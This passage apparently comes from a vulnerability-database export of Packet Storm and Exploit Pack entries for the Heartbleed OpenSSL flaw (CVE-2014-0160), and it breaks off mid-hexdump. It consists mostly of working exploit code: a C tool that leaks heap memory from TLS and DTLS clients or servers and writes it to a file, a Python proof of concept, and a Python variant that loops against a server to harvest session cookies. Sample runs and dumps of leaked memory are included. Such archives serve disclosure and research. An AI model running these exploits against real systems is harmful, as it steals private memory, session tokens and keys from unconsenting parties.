(i=6;i>=0;i--) \n{ brw += (int)v1[i]-(int)v2[i]; \nsat |= ~brw; \nbrw >>= 8; \n} \n} \nelse \n{ for (i=6;i>=0;i--) \n{ brw += (int)v1[i]-(int)v2[i]; \nsat |= brw; \nbrw >>= 8; \n} \n} \nbrw <<= 8; \n \nif (sat&0xff) return brw | 0x80; \nelse return brw + (ret&0xFF); \n} \n \nstatic int \ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority) \n{ \nDTLS1_RECORD_DATA *rdata; \npitem *item; \n \nif (pqueue_size(queue->q) >= 100) \nreturn 0; \n \nrdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA)); \nitem = pitem_new(priority, rdata); \nif (rdata == NULL || item == NULL) \n{ \nif (rdata != NULL) OPENSSL_free(rdata); \nif (item != NULL) pitem_free(item); \n \nSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR); \nreturn(0); \n} \n \nrdata->packet = s->packet; \nrdata->packet_length = s->packet_length; \nmemcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER)); \nmemcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD)); \n \nitem->data = rdata; \n \n#ifndef OPENSSL_NO_SCTP \nif (BIO_dgram_is_sctp(SSL_get_rbio(s)) && \n(s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) { \nBIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo); \n} \n#endif \n \nif (pqueue_insert(queue->q, item) == NULL) \n{ \nOPENSSL_free(rdata); \npitem_free(item); \nreturn(0); \n} \n \ns->packet = NULL; \ns->packet_length = 0; \nmemset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER)); \nmemset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD)); \n \nif (!ssl3_setup_buffers(s)) \n{ \nSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR); \nOPENSSL_free(rdata); \npitem_free(item); \nreturn(0); \n} \n \nreturn(1); \n} \n \n \nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap) \n{ \nint cmp; \nunsigned int shift; \nconst unsigned char *seq = s->s3->read_sequence; \n \ncmp = satsub64be(seq,bitmap->max_seq_num); \nif (cmp > 0) \n{ \nshift = cmp; \nif (shift < sizeof(bitmap->map)*8) \nbitmap->map <<= shift, bitmap->map |= 1UL; \nelse \nbitmap->map = 1UL; \nmemcpy(bitmap->max_seq_num,seq,8); \n} \nelse { \nshift = -cmp; \nif (shift < sizeof(bitmap->map)*8) \nbitmap->map |= 1UL<<shift; \n} \n} \n \n \nvoid usage(){ \nprintf(\"[\\n\"); \nprintf(\"[ --server|-s <ip/dns> - the server to target\\n\"); \nprintf(\"[ --port|-p <port> - the port to target\\n\"); \nprintf(\"[ --file|-f <filename> - file to write data to\\n\"); \nprintf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\"); \nprintf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\"); \nprintf(\"[ 0 = SMTP\\n\"); \nprintf(\"[ 1 = POP3\\n\"); \nprintf(\"[ 2 = IMAP\\n\"); \nprintf(\"[ --loop|-l - loop the exploit attempts\\n\"); \nprintf(\"[ --type|-t <n> - select exploit to try\\n\"); \nprintf(\"[ 0 = null length\\n\"); \nprintf(\"[ 1 = max leak\\n\"); \nprintf(\"[ n = heartbeat payload_length\\n\"); \nprintf(\"[ --udp|-u - use dtls/udp\\n\"); \nprintf(\"[\\n\"); \nprintf(\"[ --verbose|-v - output leak to screen\\n\"); \nprintf(\"[ --help|-h - this output\\n\"); \nprintf(\"[\\n\"); \nexit(0); \n} \n \nint main(int argc, char* argv[]){ \nint ret, port, userc, index; \nint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9; \nint loop = 0; \nstruct hostent *h; \nconnection* c; \nchar *host, *file; \nint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0; \nprintf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\"); \nprintf(\"[ =============================================================\\n\"); \nstatic struct option options[] = { \n{\"server\", 1, 0, 's'}, \n{\"port\", 1, 0, 'p'}, \n{\"file\", 1, 0, 'f'}, \n{\"type\", 1, 0, 't'}, \n{\"bind\", 1, 0, 'b'}, \n{\"verbose\", 0, 0, 'v'}, \n{\"precmd\", 1, 0, 'c'}, \n{\"loop\", 0, 0, 'l'}, \n{\"help\", 0, 0,'h'}, \n{\"udp\", 0, 0, 'u'} \n}; \nwhile(userc != -1) { \nuserc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvhu\",options,&index); \nswitch(userc) { \ncase -1: \nbreak; \ncase 's': \nif(ihost==0){ \nihost = 1; \nh = gethostbyname(optarg); \nif(h==NULL){ \nprintf(\"[!] FATAL: unknown host '%s'\\n\",optarg); \nexit(1); \n} \nhost = malloc(strlen(optarg) + 1); \nif(host==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nsprintf(host,\"%s\",optarg); \n} \nbreak; \ncase 'p': \nif(iport==0){ \nport = atoi(optarg); \niport = 1; \n} \nbreak; \ncase 'f': \nif(ifile==0){ \nfile = malloc(strlen(optarg) + 1); \nif(file==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nsprintf(file,\"%s\",optarg); \nifile = 1; \n} \nbreak; \ncase 't': \nif(itype==0){ \ntype = atoi(optarg); \nitype = 1; \n} \nbreak; \ncase 'h': \nusage(); \nbreak; \ncase 'b': \nif(ihost==0){ \nihost = 1; \nhost = malloc(strlen(optarg)+1); \nif(host==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nsprintf(host,\"%s\",optarg); \nbind = 1; \n} \nbreak; \ncase 'c': \nif(iprecmd == 0){ \niprecmd = 1; \nprecmd = atoi(optarg); \n} \nbreak; \ncase 'v': \nverbose = 1; \nbreak; \ncase 'l': \nloop = 1; \nbreak; \ncase 'u': \nudp = 1; \nbreak; \n \ndefault: \nbreak; \n} \n} \nif(ihost==0||iport==0||ifile==0||itype==0){ \nprintf(\"[ try --help\\n\"); \nexit(0); \n} \nssl_init(); \nif(bind==0){ \nif (udp){ \nc = dtls_client(ret, host, port); \ndtlsheartbleed(c, type); \ndtlssneakyleaky(c,file,verbose); \nwhile(repeat==1){ \ndtlssneakyleaky(c,file,verbose); \n} \nwhile(loop==1){ \nprintf(\"[ entered heartbleed loop\\n\"); \nfirst=0; \nrepeat=1; \ndtlsheartbleed(c,type); \nwhile(repeat==1){ \ndtlssneakyleaky(c,file,verbose); \n} \n} \n} \nelse { \nret = tcp_connect(host, port); \npre_cmd(ret, precmd, verbose); \nc = tls_connect(ret); \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \nwhile(loop==1){ \nprintf(\"[ entered heartbleed loop\\n\"); \nfirst=0; \nrepeat=1; \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \n} \n} \n \nSSL_shutdown(c->sslHandle); \nclose (ret); \nSSL_free(c->sslHandle); \n} \nelse{ \nint sd, pid, i; \nif (udp) { \nc = dtls_server(sd, host, port); \nwhile (1) { \nchar * bytes = malloc(1024); \nstruct sockaddr_in peer; \nsocklen_t len = sizeof(peer); \nif (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) { \ndtlsheartbleed(c,type); \ndtlssneakyleaky(c,file,verbose); \nwhile(loop==1){ \nprintf(\"[ entered heartbleed loop\\n\"); \nfirst=0; \nrepeat=0; \ndtlsheartbleed(c,type); \nwhile(repeat==1){ \ndtlssneakyleaky(c,file,verbose); \n} \n} \n} \n} \n} \nelse { \nret = tcp_bind(host, port); \nwhile(1){ \nsd=accept(ret,0,0); \nif(sd==-1){ \nprintf(\"[!] FATAL: problem with accept()\\n\"); \nexit(0); \n} \nif(pid=fork()){ \nclose(sd); \n} \nelse{ \nc = tls_bind(sd); \npre_cmd(ret, precmd, verbose); \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \nwhile(loop==1){ \nprintf(\"[ entered heartbleed loop\\n\"); \nfirst=0; \nrepeat=0; \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \n} \nprintf(\"[ done.\\n\"); \nexit(0); \n} \n} \n} \n} \n} \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126308/heartbleeddtls-leak.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:16:50", "description": "", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "packetstorm", "title": "Heartbleed Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "id": "PACKETSTORM:126070", "href": "https://packetstormsecurity.com/files/126070/Heartbleed-Proof-Of-Concept.html", "sourceData": "`#!/usr/bin/python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. \n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: \ndata = s.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' \nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(hello) \nprint 'Waiting for Server Hello...' \nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' \nsys.stdout.flush() \ns.send(hb) \nhit_hb(s) \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126070/ssltest.py.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:25:28", "description": "", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "packetstorm", "title": "Heartbleed User Session Extraction", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "PACKETSTORM:126069", "href": "https://packetstormsecurity.com/files/126069/Heartbleed-User-Session-Extraction.html", "sourceData": "`#!/usr/bin/python \n \n# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions. \n# Michael Davis (mike.philip.davis@gmail.com) \n \n# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n \n# The author disclaims copyright to this source code. \n \nimport select \nimport sys \nimport string \nimport struct \nimport socket \nimport time \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \noptions.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. (default: session)') \n \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \n \nclass HeartBleeder(object): \n \nserver_response = None \nsocket = None \nhostname = '' \nport = 443 \nfound_sessions = set() \ncookie = 'session' \ncookie_length = 56 \n \ndef __init__(self, hostname='', cookie=''): \nself.hostname = hostname \nself.cookie = cookie \n \ndef connect(self): \n\"\"\" \nConnects to the remote server. \n\"\"\" \nself.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsys.stdout.flush() \nself.socket.connect((self.hostname, self.port)) \nsys.stdout.flush() \nself.socket.send(hello) \nsys.stdout.flush() \n \ndef rcv_response(self): \nwhile True: \n_type, version, payload = self.rcv_message() \nif _type is None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif _type == 22 and ord(payload[0]) == 0x0E: \nbreak \n \ndef rcv_message(self): \n \nrecord_header = self.rcv_all(5) \nif record_header is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \n_type, version, line = struct.unpack('>BHH', record_header) \npayload = self.rcv_all(line, 10) \nif payload is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \n# print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn _type, version, payload \n \ndef rcv_all(self, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([self.socket], [], [], 5) \nif self.socket in r: \ndata = self.socket.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \ndef try_heartbeat(self): \nself.socket.send(hb) \nwhile True: \n_type, version, self.payload = self.rcv_message() \nif _type is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif _type == 24: \n# print 'Received heartbeat response:' \nself.parse_response() \nif len(self.payload) > 3: \npass \n# print 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif _type == 21: \nprint 'Received alert:' \nself.hexdump(self.payload) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef parse_response(self): \n\"\"\" \nParses the response from the server for a session id. \n\"\"\" \nascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload) \nindex = string.find(ascii, self.cookie) \nif index >= 0: \ninfo = ascii[index:index + self.cookie_length] \nsession = info.split(' ')[0] \nsession = string.replace(session, ';', '') \nif session not in self.found_sessions: \nself.found_sessions.add(session) \nprint session \n \ndef hexdump(self, payload): \n\"\"\" \nPrints out a hexdump in the event that server returns an error. \n\"\"\" \nfor b in xrange(0, len(payload), 16): \nline = [c for c in payload[b:b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in line) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef scan(self): \nself.connect() \nself.rcv_response() \nself.try_heartbeat() \n \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ncookies_str = 'session' \nif len(args) > 1: \ncookies_str = args[1] \n \nprint cookies_str \n \nwhile True: \nheartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str) \nheartbeat.scan() \n \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126069/heartbleed-altered.py.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (2) (DTLS Support)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2014-04-24T00:00:00", "title": "OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (2) (DTLS Support)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-24T00:00:00", "id": "EXPLOITPACK:1020403320036D688D074B47660E9F50", "href": "", "sourceData": "/* \n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\n* =========================================================\n* This exploit uses OpenSSL to create an encrypted connection\n* and trigger the heartbleed leak. The leaked information is\n* returned within encrypted SSL packets and is then decrypted \n* and wrote to a file to annoy IDS/forensics. The exploit can \n* set heartbeat payload length arbitrarily or use two preset \n* values for NULL and MAX length. The vulnerability occurs due \n* to bounds checking not being performed on a heap value which \n* is user supplied and returned to the user as part of DTLS/TLS \n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \n* 1.0.1f are known affected. You must run this against a target \n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\n* This exploit leaks upto 65532 bytes of remote heap each request\n* and can be run in a loop until the connected peer ends connection.\n* The data leaked contains 16 bytes of random padding at the end.\n* The exploit can be used against a connecting client or server,\n* it can also send pre_cmd's to plain-text services to establish\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\n* will often forcefully close the connection during large leak\n* requests so try to lower your payload request size. \n*\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \n*\n* E.g.\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n* [ =============================================================\n* [ connecting to 192.168.11.23 443/tcp\n* [ connected to 192.168.11.23 443/tcp\n* [ <3 <3 <3 heart bleed <3 <3 <3\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ heartbleed leaked length=65535\n* [ final record type=24, length=16384\n* [ wrote 16381 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=42\n* [ decrypting SSL packet\n* [ final record type=24, length=18\n* [ wrote 18 bytes of heap to file 'out'\n* [ done.\n* $ ls -al out\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\n* $ hexdump -C out\n* - snip - snip \n*\n* Use following example command to generate certificates for clients.\n*\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\n* -keyout server.key -out server.crt\n*\n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\" \n*\n* todo: add udp/dtls support.\n*\n* - Hacker Fantastic\n* http://www.mdsec.co.uk\n*\n*/\n\n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support\n*\n* use -u switch, tested against s_server/s_client version 1.0.1d\n* \n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1\n* ...\n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n* [ =============================================================\n* [ <3 <3 <3 heart bleed <3 <3 <3\n* [ heartbeat returned type=24 length=1392\n* [ decrypting SSL packet\n* [ heartbleed leaked length=1336\n* [ final record type=24, length=1355\n* [ wrote 1352 bytes of heap to file 'eshta'\n* \n* \n* # hexdump -C eshta \n* 00000000 00 00 00 00 06 30 f1 95 08 00 00 00 00 00 00 00 |.....0..........|\n* 00000010 8c 43 64 ab e3 89 6b fd e3 d3 74 a1 a1 31 8c 35 |.Cd...k...t..1.5|\n* 00000020 09 6d b9 e7 08 08 08 08 08 08 08 08 08 a1 65 9f |.m............e.|\n* 00000030 ca 13 80 7c a5 88 b0 c9 d5 f6 7b 14 fe ff 00 00 |...|......{.....|\n* 00000040 00 00 00 00 00 03 00 01 01 16 fe ff 00 01 00 00 |................|\n* 00000050 00 00 00 00 00 40 b5 fd a5 10 da c4 fd fb c7 d2 |.....@..........|\n* 00000060 9f 0c 56 4b a9 9c 14 00 00 0c 00 03 00 00 00 00 |..VK............|\n* 00000070 00 0c 69 ec c4 d5 f3 38 ae e5 2e 3a 1a 32 f9 30 |..i....8...:.2.0|\n* 00000080 7f 61 4c 8c d7 34 f3 02 08 3f 68 01 a9 a7 81 55 |.aL..4...?h....U|\n* 00000090 01 c9 03 03 03 03 00 00 0e 31 39 32 2e 31 36 38 |.........192.168|\n* 000000a0 2e 37 35 2e 32 33 35 00 23 00 00 00 0f 00 01 01 |.75.235.#.......|\n* 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\n*\n* 00000530 00 00 00 00 00 00 00 00 a5 e2 f5 67 d6 23 85 49 |...........g.#.I|\n* 00000540 b3 cc ed c4 d2 74 c8 97 c1 b4 cc |.....t.....|\n* 0000054b\n* \n* \n* # openssl s_client -connect localhost:990 -dtls1\n* ...\n* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n* [ =============================================================\n* [ SSL connection using AES256-SHA\n* [ <3 <3 <3 heart bleed <3 <3 <3\n* [ heartbeat returned type=24 length=1392\n* [ decrypting SSL packet\n* [ heartbleed leaked length=1336\n* [ final record type=24, length=1355\n* [ wrote 1352 bytes of heap to file 'eshta'\n* \n* \n* # hexdump -C eshta \n* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............|\n* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...\".(n|\n* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8|\n* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...|\n* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\\.h.|\n* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5|\n* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....|\n* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M|\n* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....|\n* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...|\n* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................|\n* 000000b0 00 01 00 00 00 00 00 00 00 40 62 1c 02 19 45 5f |.........@b...E_|\n* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............|\n* 000000d0 00 00 00 00 00 0c e9 fb 75 02 61 90 be 4d f7 82 |........u.a..M..|\n* 000000e0 06 d6 fd 6d 53 a1 d5 44 e0 5a 0d 6a 6a 94 ef e8 |...mS..D.Z.jj...|\n* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State|\n* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter|\n* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty |\n* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0..\"0...*.H..|\n* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 |...........0....|\n* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 5e 46 74 fa 89 |......&J...^Ft..|\n* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.|\n* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y|\n* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\\....|\n* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.|\n* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q|\n* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,|\n* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:|\n* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..|\n* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?|\n* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..|\n* 